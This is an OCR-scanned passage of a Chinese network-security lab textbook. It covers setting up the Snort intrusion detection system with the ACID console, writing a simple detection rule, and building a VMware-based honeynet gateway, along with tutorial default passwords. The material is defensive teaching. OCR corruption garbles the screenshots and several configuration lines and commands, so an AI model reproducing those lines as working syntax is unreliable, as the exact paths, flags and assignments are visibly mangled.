DEFINE ("CACHE DIR","/tmp/jpgraph cache/"); 


(3) 安装 ACID, 解 压缩 acid-0. 9. 6b23. tar. gz 到 C:\Apache\htdocs\acid 目录 下 ,并 
将 C:\Apache\htdocs\acid\acid_conf. php 文件 的 如 下 各 行内 容 修改 为 


$ DBlib path= "C:\Php\adodb"; 

$ DBtype= "mysql"; 

$ alert_doname= "snort"; 

$ alert_host= "localhost"; 

$ alert = "3306"; 

$alert user- "acid"; 

$alert password- "acid"; 

/* Archive DB connection parameters * / 

$ archive doname- "snort archive"; 

$ archive host- "localhost"; 

$ archive port- "3306"; 

$ archive user- "acid"; 

$ archive password- "acid"; 

$ ChartLib path= "C:\Php\ jpgraph\ src"; 

CA) 通过 浏览 器 访问 http: /127. 0. 0. 1/acid/acid db setup. php ,在 打开 的 页 面 中 单 
击 Create ACID AG 按钮 ,让 系统 自动 在 MySQL 中 建立 ACID 运行 必需 的 数据 库 , 如 
图 7.15 所 示 。 

6. 启动 Snort 

打开 C:\Snort\ete\snort. conf 文件 ,将 文件 中 的 下 列 语句 

include classification.config 

include reference.config 


修改 为 绝对 路 径 : 


include C:\Snort\etc\classification.config 
include C:\Snort\etc\reference.config 


在 该 文件 的 最 后 加 入 以 下 语句 : 


output database: alert, mysql, host= localhost user= snort password= snorttest doname= snort encoding= 
hex detail= full 
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З ACID: DB Setup — Microsoft Internet Explorer 
XO REO SEW бй) ТАФ hoo 


Q=- ©: d 4 OP" Усе ооа ааны 


tit O Eus Р 931 iS” Forton Antivirus 局 > 


DB Setup Sue 


Search AG Maintenance 


[ Back ] 


ACID tables Adds tables to extend the Snort DB to support the ACID functionality Create ACID AG 


L DONE 
Search Indexes. (i nar) Adds indexes to the Snort DB to optimize the speed of the queries 


[Loaded in 1 seconds] 


Roman Danyliw 
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测试 Snort 是 否 正 常 : C:\>snort -dev, 能 看 到 一 只 正在 奔跑 的 小 猪 证 明 工 作 正 常 ， 
如 图 7. 16 所 示 。 


К зок МБїп>впок& -dev 


Running in packet dump mode 


Initializing Snort 
Initializing Output Plugins? 
pcap DAQ configured to passive 


Acquiring network traffic from "*DeviceNNPF CODCRDDRC-C810—4110-9F17-—1D4BB64C9B1 
I" 


Decoding Ethernet 
Initialization Complete 


му Snort? €x 


Version 8.1-0DB 


By Martin ch & The Snor ort.o nort/snort-t 


Using PC 
Using 


Commencing packet processing < 
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查看 本 地 网 络 适 配器 编号 : Ci NL snort -W ,正式 启动 Snort: 


C:\> cd snort\bin 
C:\Snort\bin> snort - c "C:\Snort\etc\snort.conf" - i "C:\Snort\log" -d-e-X 


(注意 ,其 中 -i 后 的 参数 为 网 卡 编号 ,由 snort -W 查看 得 知 。) 
C:\Snort\bin> snort -c "C:NSnortNetcN\snort.aonf" – 1 "C:\Snort\logs"-i2-d-e-xX 
。 -Х ®@: 用 于 在 数据 链接 层 记 录 raw packet 数据 。 

。 -d 参 数 : 记录 应 用 层 的 数据 。 

* -e 参数 . 显示 /记录 第 二 层 报 文 头 数据 。 


* -c BR: 用 于 指定 Snort 的 配置 文件 的 路 径 。 

。-i 参 数 : 指明 监听 的 网 络 接口 。 

在 CMD 中 ,运行 snort -W,W 大 写 。 此 命令 可 以 作为 Snort 是 否 安装 成 功 的 标志 ， 
同时 可 以 看 到 运行 着 的 网 卡 信息 。 一 般 情况 下 ,snort -v 就 可 以 实现 简单 的 嗅 探 任 务 。 
Ctrl+C 结束 嗅 探 。 

较 复杂 的 是 配置 。RULE_PATH.、SO_RULE_PATH .PREPROC_RULE_PATH、 
dynamicpreprocessor 和 dynamicengine 的 路 径 设 置 必须 是 绝对 路 径 。 有 一 点 需要 留意 ， 
dynamicpreprocessor 的 路 径 最 后 不 要 以 斜 杠 或 反 斜 杠 结尾 , 如果 有 会 造成 引擎 加 载 
失败 。 

使 用 配置 的 命令 方式 为 : snort -v -e "C:\Snort\etc\snort. conf" , 按 此 命令 , 若 出 现 
“ERROR: OpenAlertFile ( ) = > fopen() alert file log/alert. ids: No such file or 
directory”, Hf ii snort -1 C;\Snort\mylogs -c C;\Snort\ete\snort. conf 将 文件 写 人 指 
定 目 录 中 。 

打开 http: //localhost:50080/acid/acid main. php 网 页 ,进入 ACID 分 析 控 制 台 主 界 
面 ,可 以 查看 入 侵 检 测 的 结果 ,如 图 7.17 所 示 。 


^] 
Added 0 alert(s) to the Alert cache 
Queried on : Fri December 22, 2006 16:50:24 
Database: snort_aler@localhost (schema version: 
Time window: [2006-1222 16:182] - [2006 1222 16 D 16] 
Traffic Profile by Protocol 
Unique Alerts: 12 TCH (129 d 
‘Total Number of Alerts: BG 
• Source IP addresses: 5 uor ow 
+ Dest. IP addresses: 4 
* Unique IP links 11 ICMP (68%) 
* Source Ports: 3 
° ГЕР (3) UOP (0) Portscan Traffic (0%) 
» Dest. Ports: 
o ТЕР (3) UDP (0) 
* Search 
* Graph Alert data 
* Snapshot 
* Most recent Alerts: any protocol, TCP, UDP, ICMP * Most frequent 5 Alerts 
e Today's: alerts unique, listing; IP src / dst 
* Last 24 Hours: alerts unique, listing; IP src / dst * Most Frequent Source Ports: any , TCP , UDP 
* Last 72 Hours: alerts unique, listing, IP src / dst * Most Frequent Destination Ports: any , TCP , UDP 
* Most recent 15 Unique Alerts 
v| 


A77 AQD 显 示 Sur 的 检测 结果 


利用 扫描 实验 的 要 求 扫描 局 域 网 ,查看 检测 的 结果 。 
安装 Snort 时 注意 关闭 防火 墙 。 
Appach 启动 命令 : apache -k install 或 | apache -k start。 
实验 报告 要 求 
- 实验 目的 。 
。 附 上 实验 过 程 的 截图 和 结果 截图 。 
。 阐述 碰 到 的 问题 以 及 解决 方法 。 
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。 阐述 收获 与 体会 。 


7.3 Snort 扩展 实验 


实验 器 材 
。 Snort 软件 系统 1 套 。 
* PC(Windows XP/Windows 7)1 台 。 


预习 要 求 

。 做 好 实验 预习 ,复习 入 侵 检 测 技术 的 有 关内 容 。 

。 熟悉 Snort 软件 的 使 用 方法 。 

。 熟悉 实验 过 程 和 基本 操作 流程 。 

。 做 好 预习 报告 。 

实验 任务 

通过 本 实验 ,进一步 熟悉 和 掌握 Snort 系统 ,完善 人 侵 检测 技能 。 
实验 环境 

装 有 Windows XP/Windows 7 操作 系统 的 PC 一 台 。 
预备 知识 

入 侵 检 测 原理 。 


实验 步 又 

1, 完善 配置 文件 

打开 C:/Snort/etc/snort. conf 文件 ,查看 现 有 配置 。 设 置 Snort 的 内 、 外 网 检测 范 
围 。 将 snort. conf 文件 中 var HOME. NET any 语句 中 的 any 改 为 自己 所 在 的 子 网 地 
址 ,即将 Snort 监测 的 内 网 设置 为 本 机 所 在 局 域 网 。 如 本 地 IP 为 192. 168. 1. 10, 则 将 
any 改 为 192. 168. 1. 0/24, 并 将 var EXTERNAL _NET апу 语句 中 的 any WH 
1192.168.1.0/24, 即 将 snort 监测 的 外 网 改 为 本 机 所 在 局 域 网 以 外 的 网 络 。 设 置 监测 包 
含 的 规则 。 找 到 snort. conf 文件 中 描述 规则 的 部 分 ,如 图 7. 18 所 示 «snort. conf 文件 中 
包含 的 检测 规则 文件 前 面 加 # 表示 该 规则 没有 启用 ,将 local. rules 之 前 的 # 号 去 掉 , 其 
余 规 则 保持 不 变 。 

2. 使 用 控制 台 查 看 检测 结果 

打开 http://localhost/acid/acid_main. php 网 页 ,启动 Snort 并 打开 ACID 检测 控制 
台 主 界面 ,如 图 7. 19 所 示 。 

单 击 图 示 中 TCP 后 的 数字 “80%”, 将 显示 所 有 检测 到 的 ТСР 协议 日 志 详 细 情 况 ,如 
图 7.20 所 示 。TCP 协议 日 志 网 页 中 的 选项 依次 为 流量 类 型 .时 间 截 . 源 地 址 .目标 地 址 
以 及 协议 。 由 于 Snort 主机 所 在 的 内 网 为 202. 112. 108. 0, 可 以 看 出 ,日 志 中 只 记录 了 外 
网 IP 对 内 网 的 连接 ( 即 目 标 地 址 均 为 内 网 ) 。 
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Bi snort.conf - 记事 本 


文件 E) 编辑 E) 格式 (2) FAH) 
include $RULE_PATH/finger .rules 
include $RULE_PATH/ftp.rules 
include $RULE_PATH/telnet.rules 


#include $RULE PATH/rpc.rules 
#include $RULE PATH/rservices.rules 
#include $RULE_PATH/dos.rules 
include $RULE_PATH/ddos.rules 
include $RULE PATH/dns.rules 


718 Sat 配 置 页 面 


pe e Iam 18-8 
0-0-0 - HAG a&-e@- : CR - 89) - m mage 
ШШ ГӨ] һер:/7127.0.0.1:50080/аок/аскі тапрр si main.php М http://127.0.0.1:50080/acid/acid_man.phe sR > 81Р Ее - > 


[C3 Windows Media ә] Windows @¥RMATHotMail @) 自 定义 链接 
3 ee [analys] 


|Sensors: 1 Traffic Profile by Protocol 
Unique Alerts: 34 ( 10 TCP: 

categories ) 

(Total Number of Alerts: 2021 So (< 1%) 
ө Source IP addresses: 41 
© Dest. IP addresses: 108 | ICMP (20%) 
@ Unique IP links 196 


ө Source Ports: 752 Portscan Traffic (096) 
O TCP ( 749) UDP 
3 


ө Dest. Ports. 19 
© TCP ( 18) UDP 
bay 


E] 7:9 Sat 控制 台 页 面 


选择 控制 条 中 的 home 返回 控制 台 主 界面 ,在 主 界面 的 下 部 有 流量 分 析 及 归 类 选项 ， 
如 图 7. 21 所 示 。 

选择 Last 24 Hours:alerts unique, 可 以 看 到 24 小 时 内 特殊 流量 的 分 类 记录 和 分 析 ， 
其 中 详细 记录 了 各 类 型 流量 的 种 类 在 总 日 志 中 所 占 的 比例 .出现 该 类 流量 的 起 始 和 终止 
时 间 等 详细 分 析 ( 在 控制 台 主 界面 中 还 有 其 他 功能 ,请 自己 练习 使 用 ) 。 

3. 配置 Snort 规则 

练习 添加 一 条 规则 ,以 对 符合 此 规则 的 数据 包 进 行 检测 ,打开 C: NSnortNrulesMocal. 
rules 文件 ,如 图 7. 22 所 示 。 

在 规则 中 添加 一 条 语句 ,实现 对 内 网 的 UDP 协议 相关 流量 进行 检测 ,并 报警 : udp 
ids/dns-version-query。 语 句 如 下 : 


alert udp any any< > $ НОМЕ КЕТ any (msg:"udp ids/dns- version- query";content: "version";) 
保存 文件 后 ,退出 。 重 启 Snort 和 ACID 检测 控制 台 ,使 规则 生效 。 
实验 报告 要 求 
”实验 目的 。 
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i 文件 EF) 编辑 E) BE) WEE) 快捷 组 (G) ATO TAM 50w ADH -四 
0-6-0 - Б аФ vx a$- Ente - 8-5 - 63 
НЕШ 9] http://127.0.0.1:50080/acid/acid ary. marn.php EBa- s Forage 
1C9 @Windovs Media @) Windows 32 7Ноаі1 e] 自 定义 链接 


ACID: ... |@JAnal... |) Ef... | 
Signature Timestam| oce рег 
9 P Address Address 
Ir [snort] SHELLCODE x86 0x90 2004-12-29 TCP. 
#100- unicode NOOP 11:26:51 202.112.101.34:1498 202.112.108.216 445 
a- 
1922) 
n [snort] SHELLCODE x86 0x90 2004-12-29 TCP 
#101- unicode МООР 11:26:51 202.112.101.34:1498 202.112.108.216:445 
(1- 
1921) 
г [snort] SHELLCODE x86 0x90 2004-12-29 ТСР 
#102- unicode МООР 11:26:51 202.112.101.34:1498 202.112.108.216:445 
a- 
1920) 
= кайтсак | | 
会 0 $4522 її |, 


文件 E) 编辑 E) EEV KEA 快捷 组 (G) BHO) TAM BOW WB) 8-8 


O- @- 0-5 8@ уа. Ф mame mammae 
ЖШ |®] http://127.0.0. 1:50080/acid/acid. man.php. aa- eRe "Oras 


[C3 @Windovs Media Ф) Windows @¥eIAtHotMail ә) 自 定义 链接 


@ Snapshot 
ө Most recent Alerts: any protocol, TCP, € Most frequent 5 Alerts 
UDP, ICMP 
* Today's: alerts unique, listing; IP src / ® Most Frequent Source Ports: any , TCP , UDP 
dst © Most Frequent Destination Ports: any , TCP , UDP 
* Last 24 Hours: alerts unique, listing; IP 
src / dst 
* Last 72 Hours: alerts unique, listing; IP 
src / dst 
@ Most recent 15 Unique Alerts - 


€ Most frequent 15 addresses: source, destination 


@ Last Source Ports: any , TCP , UDP 
ө Last Destination Ports: any , TCP , UDP 


会 0 84499 im | 
A721 Sut 控制 全 检测 页 面 
TT nn 1x 


RHE) REE) 格式 (2) fm) 


# This file intentionally does not come with signatures. Put your local 
# additions here. а 


В 72 Sat 规则 编辑 文件 


。 附 上 实验 过 程 的 截图 和 结果 截图 。 
о 阐述 碰 到 的 问题 以 及 解决 方法 。 
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。 阐述 收获 与 体会 。 


* 144 * 


第 8 章 虚拟 蜜 网 实验 


8.1 虚拟 蜜 网 系统 


8.1.1 BMRA 


蜜 网 技术 作为 一 种 新 兴 的 网 络 安全 技术 ,已 经 得 到 国外 很 多 研究 机 构 和 公司 的 重视 。 
密 网 技术 的 发 展 可 以 概括 为 以 下 几 个 阶段 。 

。 蜜 网 早期 (1999 年 至 2001 年 ): 这 一 阶段 的 研究 关注 于 验证 蜜 网 理论 ,试验 蜜 网 

模型 。 在 此 期 间 建立 了 第 一 代 蜜 网 模型 。 

。 蜜 网 中 期 (2002 年 至 2004 4E) ; 这 一 阶段 的 核心 研究 内 容 是 简化 蜜 网 应 用 。 中 期 

将 改进 蜜 网 的 易 用 性 作为 研究 的 重点 。 在 此 期 间 建立 了 第 二 代 蜜 网 模型 ,增强 了 
蜜 网 的 易 用 性 ,还 出 现 了 虚拟 蜜 网 技术 和 分 布 式 的 多 蜜 网 构架 。 

。 目前 , 蜜 网 的 研究 重点 是 增强 蜜 网 的 隐蔽 性 和 易 用 人 性。 

我 国 在 该 领域 的 研究 开始 较 晚 。2001 年 国家 自然 科学 基金 信息 安全 项 目 正 式 对 该 
领域 进行 了 立项 研究 。2005 年 1 月 北京 大 学 的 “狩猎 女神 ?计划 是 我 国 第 一 个 专门 针对 
蜜 网 技术 的 研究 项 目 , 同 年 2 月 该 研究 小 组 正式 加 入 世界 蜜 网 联盟 。 

蜜 网 (honeynet) 是 一 种 用 来 被 攻击 或 攻陷 的 网 络 资源 , 它 不 是 一 个 单一 的 系统 ,而 是 
一 个 让 入 侵 者 攻击 的 网 络 架 构 。 蜜 网 装 有 多 个 系统 和 应 用 软件 ,所 有 放置 在 蜜 网 内 的 系 
统 都 是 标准 的 产品 系统 ,而 不 是 仿效 的 操作 系统 和 应 用 软件 。 

蜜 网 的 三 大 核心 功能 是 数据 控制 .数据 捕获 和 数据 集中 。 

。 数据 控制 功能 能 够 防止 攻击 者 利用 蜜 网 系统 危害 第 三 方 网 络 的 安全 ,从 而 降低 蜜 

网 的 使 用 风险 。 
。 数据 捕获 功能 能 够 捕获 人 侵 者 的 所 有 攻击 行为 数据 。 
: 数据 集中 功能 便于 多 个 蜜 网 的 集中 管理 和 数据 分 析 。 


8.1.2 EMEN 


虚拟 蜜 网 和 传统 蜜 网 具有 相同 功能 ,能 够 在 单个 主机 上 运行 传统 蜜 网 的 所 有 组 成 部 
分 ,这 使 得 蜜 网 部 署 更 加 便捷 ,配置 更 加 集中 。 虚 拟 蜜 网 与 单机 蜜 铅 相 比 更 加 复杂 高 效 ， 
提高 了 蜜 铅 系 统 检 测 、 响 应 ,恢复 和 分 析 受 侵害 系统 的 能 力 。 


8.1.2.1 虚拟 蜜 网 种 类 
虚拟 蜜 网 分 为 两 类 : 独立 型 虚拟 蜜 网 和 混杂 型 虚拟 蜜 网 。 
1. 独立 型 虚拟 蜜 网 
独立 型 虚拟 蜜 网 就 是 在 一 台 物 理 主机 上 实现 整个 蜜 网 系统 ,包括 具有 数据 控制 和 数 
据 捕获 功能 的 蜜 网 网 关 以 及 蜜 网 中 的 蜜 缸 ,如 图 8. 1 所 示 。 
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dh зу ЖШ p UL PER DC ni. 便携 性 ;廉价 的 空间 开销 。 

独立 型 虚拟 蜜 网 的 缺点 : 需要 高 性 能 硬件 配置 ;安全 性 极 大 程度 上 依赖 于 虚拟 软件 ; 
由 于 物理 主机 的 硬件 限制 ,很 难 实现 对 所 需 操 作 系统 的 完美 模拟 。 

2. 混杂 型 虚拟 蜜 网 

混杂 型 虚拟 蜜 网 是 一 种 同时 使 用 蜜 网 网 关 和 虚拟 软件 实现 蜜 网 系统 的 方案 。 数 据 捕 
获 ( 如 防火 墙 ) .数据 控制 (如 IDS) 和 日 志 系统 都 放 在 一 个 独立 、 隔 离 的 系统 中 ,而 所 有 蜜 
饶 都 运行 在 另 一 个 主机 的 虚拟 空间 中 ,这 种 方案 减少 了 虚拟 蜜 网 的 风险 ,如 图 8.2 所 示 。 


物理 系统 


图 81 独立 型 虚拟 蜜 网 结构 图 82 混杂 型 虚拟 蜜 网 系统 结构 


混杂 型 虚拟 蜜 网 的 优点 : 安全 性 和 灵活 性 ;入 侵 者 仅 可 能 和 人 侵 虚拟 蜜 饶 ; 可 以 根据 需 
要 运行 任意 种 类 的 蜜 馈 。 
混杂 型 虚拟 蜜 网 的 缺点 : 不 易 移动 ;便携 性 不 强 ;需要 较 高 的 费用 和 空间 开销 。 


8.1.2.2 蜜 网 实现 方式 
虚拟 蜜 网 的 实现 方法 主要 有 三 种 : VMware Workstation, VMware GSX Server 和 
User Mode Linux。 
1. VMware Workstation 
VMware Workstation 是 一 个 虚拟 机 软件 ,可 以 运行 在 Linux 和 Windows 两 种 平台 
下 ,模拟 主板 .内存 、 硬 盘 、 网 卡 .声卡 `USB 口 等 多 种 硬件 。VMware Workstation 是 目前 
搭建 虚拟 蜜 网 的 最 佳 选择 ,设计 对 象 主要 为 桌面 用 户 ,功能 强大 。 
VMware Workstation 具有 以 下 特性 : 
。 支持 多 种 操作 系统 。 虚 拟 环 境 中 可 以 运行 的 操作 系统 包括 Linux, Solaris, 
Windows 和 FreeBSD 等 。 
。 提供 两 种 联网 方式 : 一 是 为 独立 型 虚拟 蜜 网 提供 的 桥接 方式 ;一 是 为 独立 型 虚拟 
蜜 网 提供 的 Host-Only 联网 方式 。 
。 支持 镜像 功能 。 为 每 个 虚拟 蜜 钠 提供 镜像 文件 ,方便 了 蜜 负 的 移植 和 备份 ,并 具 
有 加 载 虚拟 磁盘 镜像 的 功能 。 
。 具有 较 好 的 技术 支持 、 升 级 和 补丁 等 服务 和 方便 易 用 的 图 形 接口 。 
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2. VMware GSX Server 

VMware GSX Server 是 VMware Workstation 的 服务 器 增强 版 本 ,可 以 运行 更 多 复 
杂 的 服务 。VMware GSX Server 一 般 将 Linux 和 Windows 作为 宿主 操作 系统 。 
VMware 公司 还 有 一 种 ESX Server 服务 器 版 本 ,不 但 提供 软件 解决 方案 ,而 且 提 供 一 定 
的 硬件 解决 方案 。 

3. User Mode Linux 

UML 具有 在 一 个 系统 上 同时 运行 多 个 Linux 实例 的 能 力 。 它 是 一 种 相对 较 新 的 工 
具 , 具 有 很 大 的 发 展 潜力 。 

User Mode Linux 具有 以 下 特性 : 

。 开放 公开 的 源 代码 ,可 以 根据 需要 修改 UML 源 代码 。 

。 可 供 “ 指 纹 ” 识 别 的 信息 较 少 ,资源 要 求 较 少 。 

。 可 以 构建 多 个 虚拟 网 络 ,并 且 能 够 在 虚拟 网 络 里 创建 虚拟 路 由 器 。 

。 支持 桥接 和 Host-Only 两 种 联网 方式 。 

。 支持 操作 系统 内 核 记录 击 刍 序列 功能 。 

。 可 通过 预先 配置 好 的 可 下 载 的 文件 系统 方式 来 实现 虚拟 蜜 钢 。 

。 支持 多 种 方式 访问 UML 控制 台 , 包 括 使 用 伪 终 端 \xterm\ 通 过 Telnet 方式 进入 

的 入 口 ,甚至 通过 屏幕 方式 。 

UML 目前 仅 支持 Linux 虚拟 机 器 ,而 且 UML 还 存在 很 多 程序 漏洞 文档 和 安全 问题 ， 

由 于 UML 没有 GUI 图 形 界面 ,现在 所 有 配置 和 实现 都 必须 在 命令 行 下 完成 ,不 易 使 用 。 


8.2 搭建 虚拟 蜜 网 


实验 器 材 
。 虚 拟 蜜 网 软件 综合 系统 1 套 。 
* PC(Windows XP/Windows 7)1 #. 
预习 要 求 
。 做 好 实验 预习 ,复习 虚拟 蜜 网 技术 的 有 关内 容 。 
。 熟悉 搭建 虚拟 蜜 网 的 各 类 软件 。 
。 熟悉 实验 过 程 和 基本 操作 流程 。 
。 做 好 预习 报告 。 
实验 任务 
通过 本 实验 ,学 会 安装 相关 虚拟 蜜 网 软件 的 方法 ,了 解 虚拟 蜜 网 的 搭建 过 程 。 
实验 环境 
操作 系统 为 Windows XP 的 PC 一 台 。 
预备 知识 
。 虚拟 蜜 网 原理 。 
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实验 步骤 

1. 搭建 工具 介绍 

VMware 软件 主要 有 VMware Player( 免 费 )\VMware Workstation, VMware GSX 
Server( 目 前 License 免费 ) , VMware ESX Server 等 版 本 ,本 实验 使 用 的 版 本 为 VMware 
Workstation 5. 5. 1-19175. 

运行 在 VMware 虚拟 机 软件 上 的 操作 系统 的 网 络 连接 方式 有 三 种 。 

CD 桥接 方式 (Bridge) : 在 桥接 方式 下 ,VMware 模拟 一 个 虚拟 网 卡 , 主 系统 对 于 客 
户 系统 来 说 相当 于 是 一 个 桥接 器 ,客户 系统 对 于 外 部 直接 可 见 , 如 图 8. 3 所 示 。 


Virtual 
Ethernet 
Adapter 


пйшшпппппшп 


Virtual Machine 


Virtual Ethernet Switch Host 
| _ (VMnet0) Ethernet 
| Virtual Bridge Adapter 


(2) 网 络 地 址 转换 方式 (NAT ): 客户 系统 不 能 直接 连接 网 络 , 必 须 通 过 主 系统 对 所 有 
进出 网 络 的 客户 系统 收发 的 数据 包 做 地 址 转换 ,客户 系统 对 于 外 部 不 可 见 , 如 图 8.4 所 示 。 


图 83 桥接 方式 


Virtual 
Ethernet 
Adapter 


gümsgmERZER 


Virtual Ethernet Switch 
(VMnet 8) 


Virtual Machine DHCP Server 


NAT Device 
图 84 网 络 地 址 转换 方式 


(3) 主机 方式 (Host-Only): 主 系统 模拟 一 个 虚拟 的 交换 机 ,所 有 客户 系统 通过 这 个 
交换 机 进出 网 络 。 如 果 主 系统 是 用 公 网 ІР 连接 Internet, 那 么 客户 系统 只 能 用 私有 ІР. 
如 果 另 外 安装 一 个 系统 通过 桥接 方式 连接 Internet, 则 这 些 客户 系统 的 IP HAM IP, 直 
接 从 这 个 虚拟 的 桥接 器 连接 Internet, WAI 8. 5 所 示 。 

若 宿主 主机 只 有 一 块 网 卡 ,可 在 该 网 卡 上 绑 定 多 个 IP 地 址 ,实际 配置 中 将 IP 地 址 
192. 168. 0. 2( 攻 击 机 IP) Al 192. 168. 1. 2( 控 制 机 IP) 均 绑 定 到 宿主 主机 网 卡 上 ,如 图 8.6 
所 示 。 
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Virtual Machine 


Host Virtual 
Adapter 


图 85 主机 方式 


$m ТСР/ІР 设置 
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Virtual Ethernet Switch 
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图 86 网 卡 绑 定 设置 


2. 环境 配置 

宿主 主机 : 

。 操作 系统 : Windows 2000/Windows XP, 
* VMware Workstation 5. 5. 1-19175 。 

蜜 网 网 关 虚 拟 机 : 

* Roo Honeywall CDROM v1. 0-hw189. 
SE HE HEAD. ЮЛ: 

* Windows 2000 Pro, 

3. 系统 搭建 

(1) 以 默认 方式 安装 VMware Workstation 软件 。 
(2) 安装 蜜 网 网 关 虚 拟 机 。 


首先 ,新 建 虚拟 机 ,选择 Custom 安装 类 型 ,如 图 8.7 所 示 。 


[v] 自动 路 点 计数 Ww ~ 
接口 路 点 数 加 


* 149 * 


New Virtual Machine Wizard 


Select the Appropriate Configuration 
How woulé you prefer to configure your new virtual 
^ 


y Vitual machine configuration 


tual machine with and configuration 
Thr Gul төсне v n be one allo wi irre ES server 
2.x, GSX Server 3.x, ACE 1.x or Workstation 4.x. 


© шоп 
Choose this option you need to create a vitua machine with eddilicnal 
devices specie corligui alion uus, Ї you red lo aed a egay vitud 


(Є &—®®[к—®@ 5 
图 87 虚拟 机 安装 界面 


其 次 ,选择 蜜 网 网 关 虚 拟 机 的 操作 系统 类 型 ,如 图 8. 8 所 示 。 操 作 系 统 选择 Linux, 
版 本 选择 Red Hat Linux。 


New Virtual Machine Wizard 


Select а Guest Operating System 
Thich operating systen will be installed on this 
tual machine? 


- Guest operating system 
О Microsolt Windows 
Olina 

| O Novel Netware 


| O Sun Solaris 
| O Other 


Version 


| Red Hat Linux 


Gre 
88 操作 系统 选择 界面 


接 下 来 ,设置 蜜 网 网 关 虚 拟 机 命名 与 路 径 , 如 图 8. 9 所 示 。 

设置 蜜 网 网 关 虚 拟 硬件 ,如 图 8. 10 所 示 。 

设置 蜜 网 网 关 虚 拟 机 内 存 大 小 ,建议 设 为 256MB, 如 图 8. 11 所 示 。 

设置 网 络 连 接 方式 ,选择 Use bridged networking (桥接 模式 ), 需 男 加 两 个 网 卡 ,如 
图 8.12 所 示 。 

设置 虚拟 硬盘 接口 类 型 ,SCSI 接口 选择 BusLogic, 如 图 8. 13 所 示 。 

创建 虚拟 硬盘 ,如 图 8. 14 所 示 。 

设置 虚拟 硬盘 为 SCSI, 如 图 8.15 所 示 。 

设置 虚拟 硬盘 大 小 为 4GB, 无 需 立 即 分 配 全 部 空间 ,如 图 8. 16 所 示 。 

指定 虚拟 硬盘 文件 绝对 路 径 , 注 意 必须 给 出 完整 路 径 , 不 要 出 现 中 文字 符 , 如 图 8.17 
所 示 。 
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Нет Yirtual Machine Wizard 


Home the Virtuel Machine 


That name vould you like to use for this virtual 
machine? 


- Vitual machine name — — 
Honeywall 


Location 


ID SVmwareNHoneywal 


Нет Virtual Machine Wizard 


Processor Configuration 


Specify the number of virtual processors for this 
virtual machine. 


Processors 
Number of processos. (lind 
©те 


<&—%®®)[т—5@ | 取消 
810 虚拟 硬件 设置 界面 


Нет Virtual Machine Wizard 


Wemory for the Virtual Nachine 


How much memory would you like to use for this virtual 
machine? 


Memoty 


Specify the amount of memory allocated to thie vitual machine. The memory size 
must be a muliple of 4 МВ. 


fer this 


Д Guest 05 recommended minimum: IME 
А Recommended memory. 256МЕ 
А Maximum recommended memory — 1272ME 


(emer ure] 


图 811 硬件 内 存 设 置 界面 
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Нет Virtual Machine Wizard 


Netrork Type 
What type of network do you want to add? 


© Use bridged net 
Give the gues! operating system direct access to an extemal Ethemal network. 
The guest must have its own IP address on the external network. 


О Use network address translation (МАТ) 


Give the gues! operating system access lo the host computers dialup or 
external Ethemet network connection using the host's IP address. 


| O Use host-only networking 
Connect the guest operating system to а private virtual network on the host 
computer, 


Ne 


(i= | UE (ms 
ааг 网 络 连接 类 型 设置 界面 


Hew Yirtual Machine Wizard 


Select 1/0 Adapter Types 
hich adepter type would you like to use? 


100 adapter уре. 


(EET i 
图 813 硬盘 接口 设置 界面 


New Virtual Machine Wizard 


Select a Disk 
Which disk do you want this drive to use? 


r Disk. 

Create a new yitual dsk 
A vittual disk is composed of one or more Нез on the host file system. which will 
appear as a single hard disk to the guest operating system. Virtual disks сап 
easily be copied or moved on the same host or between hosts. 

© Use en existing virtual disk 
Choose this option to reuse a previously configured dis. 

© Use a physical disk [for advanced users] 
Choose this option to give the vitual machine drect access to a local herd disk. 


Eat 创建 虚拟 硬盘 
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New Yirtu. 


What kind of disk do you vant to create? 


图 815 虚拟 硬盘 类 型 


Hew Virtual Machine Wizard [x] 


Specify Disk Capacity 
How large do you want this disk to be? 


图 816 指定 硬盘 容量 


Hew Virtual Machine Wizard 


Specify Disk File 
Phere would you like t» store information about this 
disk? 


图 817 文件 存储 路 径 
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接 下 来 ,需要 对 虚拟 机 进行 具体 配置 ,添加 两 块 网 卡 , 如 图 8. 18.19 8. 19 Pras ,其 中 ， 
Ethernet 2 设 为 Host-only,Ethernet 3 设 为 Bridged。 


57Honeywall — VEware Workstation 


Eile Edit View Iean Windows Help 


Power 
Eemovable D 


Favorites 
а Snapshot 


VMware Workstation 5.5.1 


Shard Disk (SCSI 0:0) 

Qemer (пк 1:0) 

Ethernet Bridged 
Ethernet 2 Hest-only 
Ethernet 3 Dridged 
Qus Contreller Prezent 
$i) Audio Auto d. 
Virtua Processors 1 


|. —— 


Туре here to enter notes for this virtual machine 


图 818 选择 设置 功能 


Virtual Machine Settings 


Hardware | Options | 


pe p ee г 
Device ЕТ Ionia ема: 
[TI 258 МВ [.|Connected 
Nard Disk (SCSI 0:0) E Connec! at power ол 
cia (пк 1:0) Auto detect Nek ences 
ГТ Bridged ec 
©з Controller Present О Ercged: Connected directly to the physical network 
Po NES d Sen O NAT: Used to share the host's IP address 

2 © Hoskony A private netwerk shared with the host 
‚Ее О Custom: Specific vitual network 


VYMnetD (default Edged} 


图 819 添加 网 卡 


设置 CD-ROM 为 蜜 网 网 关 ,ISO 为 roo vl. 0-hw189 软件 ,如 图 8. 20 тл. 
启动 蜜 网 网 关 虚 拟 机 ,安装 蜜 网 网 关 软 件 , 按 回 车 键 开始 安装 ,如 图 8.21 至 图 8. 23 


所 示 。 
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Hardware | Options] 


Device Summary Urso 
2 T] Connected 
Г ТЕЕ 252 WB iad 
Hard Disk (CSI 0:0) Tel Connect at power on 
-ROM CIDE 1:0) Using imaze D... ee 
hernet Dridged um 
Ethernet 2 Host-only O Use physica dive, 
Ethernet 3 Bridged А 
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@ Virtual Processors 1 
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Vile Edit View W Tear Finémws Help 


m и | 办 Bole a 


itt! HARN 


Continuing vill write existing Hard Drive 


Hit Creturn) key 


y icu do not have Whare Tools installed 


图 821 网 关 软 件 安装 界面 


G) 配置 蜜 网 网 关 虚 拟 机 。 
以 roo/honey 作为 默认 用 户 名 /口令 登录 ,使 用 su- 提 升 到 root 账号 ,默认 口令 也 为 
honey, 如 图 8. 24 所 示 。 
接 下 来 进行 蜜 网 网 关 初 始 配置 ,如 图 8. 25 所 示 。 如 未 能 成 功 进入 , 则 在 shell 中 执行 
B 4 项 Honeywall Configuration 进行 设置 ,如 图 8. 26 所 示 。 
对 The Honeynet Project 的 不 承担 风险 声明 选择 Yes, 如 图 8. 27 所 示 。 
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图 822 蜜 网 网 关 软 件 安 装 过 程 
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S| Honeywall — Vivare Workstation 
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Honeywall roo-1.8.hu-109 
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login: S 7:42 on tiui 
